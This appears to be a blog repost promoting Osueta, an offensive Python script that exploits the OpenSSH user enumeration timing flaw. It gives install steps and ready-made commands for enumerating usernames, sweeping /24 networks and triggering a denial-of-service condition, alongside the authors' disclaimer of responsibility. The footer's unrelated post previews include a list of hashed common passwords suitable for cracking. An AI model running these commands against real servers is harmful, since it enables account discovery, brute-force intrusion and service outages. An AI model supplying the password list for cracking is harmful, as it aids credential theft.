Skip to main content

Osueta: A Simple Python Script To Exploit The OpenSSH User Enumeration Timing Attack

By admin

About Osueta?
   Osueta it's a simple Python 2 script to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH versions <= 7.2 and >= 5.*. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DoS condition in the OpenSSH server.

    Read more: OpenSSH User Enumeration Time-Based Attack

   The bug was corrected in OpenSSH version 7.3.

   Authors of Osueta:

Osueta's Installation
   For Linux users, open your Terminal and enter these commands:
   If you're Windows users, follow these steps:
  • Install Python 2.7.x from Python.org first. On Install Python 2.7.x Setup, choose Add python.exe to Path.
  • Download Osueta-master zip file.
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install python-nmap paramiko IPy
    python osueta.py -h

Advice: Like others offensive tools, the authors disclaims all responsibility in the use of this script.

Osueta help menu:

Osueta's examples:
   A single user enumeration attempt with username variations:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes

   A single user enumeration attempt with no user variations a DoS attack:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes

   Scanning a C class network with only one user:
python2 osueta.py -H 192.168.1.0/24 -p 22 -U root -v no 

   Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
python2 osueta.py -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50

Related links


Comments

Post a Comment

Popular posts from this blog

鄭子璉 | 個人隨寫

By admin
https://tlcheng.wordpress.com/%e9%97%9c%e6%96%bc/ https://tlcheng.wordpress.com/%e8%87%aa%e7%94%b1%e7%95%99%e8%a8%80/ https://tlcheng.wordpress.com/ https://tlcheng.wordpress.com/page/2/ https://tlcheng.wordpress.com/2019/08/21/sql-server-%e8%b3%87%e6%96%99%e5%ba%ab%e6%90%8d%e6%af%80%e8%88%87%e4%bf%ae%e5%be%a9/ https://tlcheng.wordpress.com/author/tlcheng/ https://tlcheng.files.wordpress.com/2019/08/19133007_info_dbcc_825_01.png https://tlcheng.files.wordpress.com/2019/08/19134221_fail_dbcc_8646.png https://tlcheng.files.wordpress.com/2019/08/19140935_fail_dbcc_824.png https://tlcheng.files.wordpress.com/2019/08/19153642_info_dbcc_8957_01.png https://tlcheng.files.wordpress.com/2019/08/19160231_fail_lock_1204.png https://tlcheng.files.wordpress.com/2019/08/19160326_info_dbcc_825_02.png https://tlcheng.files.wordpress.com/2019/08/20232545_info_dbcc_8957_02.png https://tlcheng.files.wordpress.com/2019/08/20234545_info_dbcc_8957_03.png https://tlcheng.files.wordpress.com/2019/08/20235716_...
Post a Comment
Read more

5525 Interesting News

By admin
TikTok Restoring Service for U.S. Users, After Trump Signals He Will Save It The pandemic has changed the shape of global happiness The "Scream" franchise adds another self-referential sequel Millions of Chinese people play guandan. Is that good or bad? A theatre in Jenin offers a different kind of Palestinian resistance Economic data, commodities and markets Covid-19 has shone a light on racial disparities in health Is Syria's drug-dealing dictator coming in from the cold? Female soldiers are changing how armed forces work This Tool Probes Frontier AI Models for Lapses in Intelligence How much cash should be removed from the financial system? Can the voluntary carbon market save the Amazon? File-Unpumper - Tool That Can Be Used To Trim Useless Things From A PE File Such As The Things A File Pumper Would Add This week's cover War in space is no longer science fiction The best Apple deals you can get right now: Save on Apple TV+, AirPods, iPads and more Trump's Agg...
Post a Comment
Read more

9774 hash passwords

By admin
blake2b-256(jade41) blake2b-256(jade420) blake2b-256(jade429) blake2b-256(jade44) blake2b-256(jade456) blake2b-256(jade4ever69) blake2b-256(jade50) blake2b-256(jade5264) blake2b-256(jade555) blake2b-256(jade5565) blake2b-256(jade69) blake2b-256(Jade69) blake2b-256(jade98) blake2b-256(jadebaby11121) blake2b-256(jadebink) blake2b-256(jadeblue) blake2b-256(jadecape) blake2b-256(jadeck) blake2b-256(jadeclub) blake2b-256(jaded) blake2b-256(jaded1) blake2b-256(jaded2) blake2b-256(jaded69) blake2b-256(jadedbaby) blake2b-256(jadedd) blake2b-256(jadedragonflower) blake2b-256(jadeds) blake2b-256(jadeduck) blake2b-256(jadeee) blake2b-256(jadeeeee) blake2b-256(jadefox) blake2b-256(jadehungder) blake2b-256(jadejade) blake2b-256(jadejord) blake2b-256(jadejs) blake2b-256(jadeland) blake2b-256(jadelilly) blake2b-256(jadelugo) blake2b-256(jadelyn) blake2b-256(jadelynn) blake2b-256(jadelynp) blake2b-256(jaden) blake2b-256(jaden0) blake2b-256(jaden1) blake2b-2...
Post a Comment
Read more